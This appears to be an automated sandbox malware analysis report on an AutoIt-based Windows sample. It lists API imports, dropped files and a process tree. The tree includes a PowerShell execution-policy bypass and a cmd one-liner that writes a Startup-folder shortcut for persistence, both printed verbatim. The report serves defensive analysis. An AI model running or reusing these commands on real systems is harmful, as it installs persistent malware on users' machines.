Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF7978C0D24 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00007FF7978C0D24
Source: C:\Users\Public\InformationCheck.exeCode function: 3_2_004D4830 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,3_2_004D4830
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 8_2_00F94830 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,8_2_00F94830
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF7978C0A6C OpenClipboard,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00007FF7978C0A6C
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF7978A7E64 GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_00007FF7978A7E64
Source: C:\Users\Public\InformationCheck.exeCode function: 3_2_004ED164 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,3_2_004ED164
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 8_2_00FAD164 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,8_2_00FAD164

System Summary

barindex
Source: C:\Users\user\Desktop\file.exeCode function: This is a third-party compiled AutoIt script.0_2_00007FF7978337B0
Source: file.exeString found in binary or memory: This is a third-party compiled AutoIt script.
Source: file.exe, 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_94912b12-4
Source: file.exe, 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer@*memstr_a8c22b00-1
Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF7978AC110: CreateFileW,DeviceIoControl,CloseHandle,0_2_00007FF7978AC110
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF79789D2C4 GetCurrentProcess,OpenProcessToken,CreateEnvironmentBlock,CloseHandle,CreateProcessWithLogonW,DestroyEnvironmentBlock,0_2_00007FF79789D2C4
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF7978AD750 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_00007FF7978AD750
Source: C:\Users\Public\InformationCheck.exeCode function: 3_2_004C5778 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,3_2_004C5778
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 8_2_00F85778 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,8_2_00F85778
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF7978CF6300_2_00007FF7978CF630
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF797842E300_2_00007FF797842E30
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF7978458D00_2_00007FF7978458D0
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF79785F8D00_2_00007FF79785F8D0
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF79783183C0_2_00007FF79783183C
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF7978718400_2_00007FF797871840
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF7978AD87C0_2_00007FF7978AD87C
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF7978E17C00_2_00007FF7978E17C0
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF7978617500_2_00007FF797861750
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF7978C56A00_2_00007FF7978C56A0
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF7978695B00_2_00007FF7978695B0
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF79783B3900_2_00007FF79783B390
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF7978C32AC0_2_00007FF7978C32AC
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF79787529C0_2_00007FF79787529C
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF7978C206C0_2_00007FF7978C206C
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF797835F3C0_2_00007FF797835F3C
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF79785BEB40_2_00007FF79785BEB4
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF79783BE700_2_00007FF79783BE70
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF797843C200_2_00007FF797843C20
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF7978DDB180_2_00007FF7978DDB18
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF7978B1A180_2_00007FF7978B1A18
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF79784FA4F0_2_00007FF79784FA4F
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF79783B9F00_2_00007FF79783B9F0
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF7978DBA0C0_2_00007FF7978DBA0C
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF79786793C0_2_00007FF79786793C
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF79786A8A00_2_00007FF79786A8A0
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF7978767F00_2_00007FF7978767F0
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF7978DC6D40_2_00007FF7978DC6D4
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF7978DA59C0_2_00007FF7978DA59C
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF7978D055C0_2_00007FF7978D055C
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF7978684C00_2_00007FF7978684C0
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF7978545140_2_00007FF797854514
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF7978B83D40_2_00007FF7978B83D4
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF79785C3FC0_2_00007FF79785C3FC
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF7978724000_2_00007FF797872400
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF7978C63200_2_00007FF7978C6320
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF7978C83600_2_00007FF7978C8360
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF7978502C40_2_00007FF7978502C4
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF79785C1300_2_00007FF79785C130
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF7978630DC0_2_00007FF7978630DC
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF797840E700_2_00007FF797840E70
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF7978DCE8C0_2_00007FF7978DCE8C
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF797850E900_2_00007FF797850E90
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF797876DE40_2_00007FF797876DE4
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF797872D200_2_00007FF797872D20
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF7978C6C340_2_00007FF7978C6C34
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF7978D0AEC0_2_00007FF7978D0AEC
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF797832AE00_2_00007FF797832AE0
Source: C:\Users\Public\InformationCheck.exeCode function: 3_2_0046B0203_2_0046B020
Source: C:\Users\Public\InformationCheck.exeCode function: 3_2_004694E03_2_004694E0
Source: C:\Users\Public\InformationCheck.exeCode function: 3_2_00469C803_2_00469C80
Source: C:\Users\Public\InformationCheck.exeCode function: 3_2_004823F53_2_004823F5
Source: C:\Users\Public\InformationCheck.exeCode function: 3_2_004E84003_2_004E8400
Source: C:\Users\Public\InformationCheck.exeCode function: 3_2_004965023_2_00496502
Source: C:\Users\Public\InformationCheck.exeCode function: 3_2_0049265E3_2_0049265E
Source: C:\Users\Public\InformationCheck.exeCode function: 3_2_0046E6F03_2_0046E6F0
Source: C:\Users\Public\InformationCheck.exeCode function: 3_2_0048282A3_2_0048282A
Source: C:\Users\Public\InformationCheck.exeCode function: 3_2_004989BF3_2_004989BF
Source: C:\Users\Public\InformationCheck.exeCode function: 3_2_00496A743_2_00496A74
Source: C:\Users\Public\InformationCheck.exeCode function: 3_2_004E0A3A3_2_004E0A3A
Source: C:\Users\Public\InformationCheck.exeCode function: 3_2_00470BE03_2_00470BE0
Source: C:\Users\Public\InformationCheck.exeCode function: 3_2_0048CD513_2_0048CD51
Source: C:\Users\Public\InformationCheck.exeCode function: 3_2_004BEDB23_2_004BEDB2
Source: C:\Users\Public\InformationCheck.exeCode function: 3_2_004C8E443_2_004C8E44
Source: C:\Users\Public\InformationCheck.exeCode function: 3_2_004E0EB73_2_004E0EB7
Source: C:\Users\Public\InformationCheck.exeCode function: 3_2_00496FE63_2_00496FE6
Source: C:\Users\Public\InformationCheck.exeCode function: 3_2_004833B73_2_004833B7
Source: C:\Users\Public\InformationCheck.exeCode function: 3_2_0047D45D3_2_0047D45D
Source: C:\Users\Public\InformationCheck.exeCode function: 3_2_0048F4093_2_0048F409
Source: C:\Users\Public\InformationCheck.exeCode function: 3_2_004616633_2_00461663
Source: C:\Users\Public\InformationCheck.exeCode function: 3_2_0047F6283_2_0047F628
Source: C:\Users\Public\InformationCheck.exeCode function: 3_2_0046F6A03_2_0046F6A0
Source: C:\Users\Public\InformationCheck.exeCode function: 3_2_004816B43_2_004816B4
Source: C:\Users\Public\InformationCheck.exeCode function: 3_2_004878C33_2_004878C3
Source: C:\Users\Public\InformationCheck.exeCode function: 3_2_00481BA83_2_00481BA8
Source: C:\Users\Public\InformationCheck.exeCode function: 3_2_0048DBA53_2_0048DBA5
Source: C:\Users\Public\InformationCheck.exeCode function: 3_2_00499CE53_2_00499CE5
Source: C:\Users\Public\InformationCheck.exeCode function: 3_2_0047DD283_2_0047DD28
Source: C:\Users\Public\InformationCheck.exeCode function: 3_2_00481FC03_2_00481FC0
Source: C:\Users\Public\InformationCheck.exeCode function: 3_2_0048BFD63_2_0048BFD6
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 8_2_00F2B0208_2_00F2B020
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 8_2_00F294E08_2_00F294E0
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 8_2_00F29C808_2_00F29C80
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 8_2_00F423F58_2_00F423F5
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 8_2_00FA84008_2_00FA8400
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 8_2_00F565028_2_00F56502
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 8_2_00F2E6F08_2_00F2E6F0
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 8_2_00F5265E8_2_00F5265E
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 8_2_00F4282A8_2_00F4282A
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 8_2_00F589BF8_2_00F589BF
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 8_2_00F56A748_2_00F56A74
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 8_2_00FA0A3A8_2_00FA0A3A
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 8_2_00F30BE08_2_00F30BE0
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 8_2_00F7EDB28_2_00F7EDB2
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 8_2_00F4CD518_2_00F4CD51
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 8_2_00FA0EB78_2_00FA0EB7
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 8_2_00F88E448_2_00F88E44
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 8_2_00F56FE68_2_00F56FE6
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 8_2_00F433B78_2_00F433B7
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 8_2_00F3D45D8_2_00F3D45D
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 8_2_00F4F4098_2_00F4F409
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 8_2_00F416B48_2_00F416B4
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 8_2_00F2F6A08_2_00F2F6A0
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 8_2_00F216638_2_00F21663
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 8_2_00F3F6288_2_00F3F628
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 8_2_00F478C38_2_00F478C3
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 8_2_00F4DBA58_2_00F4DBA5
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 8_2_00F41BA88_2_00F41BA8
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 8_2_00F59CE58_2_00F59CE5
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 8_2_00F3DD288_2_00F3DD28
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 8_2_00F4BFD68_2_00F4BFD6
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 8_2_00F41FC08_2_00F41FC0
Source: Joe Sandbox ViewDropped File: C:\Users\Public\InformationCheck.exe 237D1BCA6E056DF5BB16A1216A434634109478F882D3B1D58344C801D184F95D
Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif 237D1BCA6E056DF5BB16A1216A434634109478F882D3B1D58344C801D184F95D
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: String function: 00F40D17 appears 70 times
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: String function: 00F48B30 appears 42 times
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: String function: 00F31A36 appears 34 times
Source: C:\Users\Public\InformationCheck.exeCode function: String function: 00488B30 appears 42 times
Source: C:\Users\Public\InformationCheck.exeCode function: String function: 00471A36 appears 34 times
Source: C:\Users\Public\InformationCheck.exeCode function: String function: 00480D17 appears 70 times
Source: C:\Users\user\Desktop\file.exeCode function: String function: 00007FF797858D58 appears 76 times
Source: file.exe, 00000000.00000003.1700160371.000002B512254000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAutoIt3.exeB vs file.exe
Source: file.exe, 00000000.00000003.1693624835.000002B51232E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAutoIt3.exeB vs file.exe
Source: classification engineClassification label: mal100.expl.evad.winEXE@12/10@3/1
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF7978B3778 GetLastError,FormatMessageW,0_2_00007FF7978B3778
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF79789D5CC LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_00007FF79789D5CC
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF79789CCE0 AdjustTokenPrivileges,CloseHandle,0_2_00007FF79789CCE0
Source: C:\Users\Public\InformationCheck.exeCode function: 3_2_004B8DE9 AdjustTokenPrivileges,CloseHandle,3_2_004B8DE9
Source: C:\Users\Public\InformationCheck.exeCode function: 3_2_004B9399 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,3_2_004B9399
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 8_2_00F78DE9 AdjustTokenPrivileges,CloseHandle,8_2_00F78DE9
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 8_2_00F79399 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,8_2_00F79399
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF7978B58C4 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_00007FF7978B58C4
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF7978ABE00 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_00007FF7978ABE00
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF7978B5F2C CoInitialize,CoCreateInstance,CoUninitialize,0_2_00007FF7978B5F2C
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF797836580 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_00007FF797836580
Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\Public\InformationCheck.exeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7732:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7460:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eamjnkh2.zwk.ps1Jump to behavior
Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: file.exeReversingLabs: Detection: 31%
Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\ProfileDetails.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\Public\InformationCheck.exe "C:\Users\Public\InformationCheck.exe" C:\Users\Public\Details.au3
Source: C:\Users\Public\InformationCheck.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & exit
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js"
Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G"
Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\ProfileDetails.ps1"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\Public\InformationCheck.exe "C:\Users\Public\InformationCheck.exe" C:\Users\Public\Details.au3 Jump to behavior
Source: C:\Users\Public\InformationCheck.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & exitJump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G"Jump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
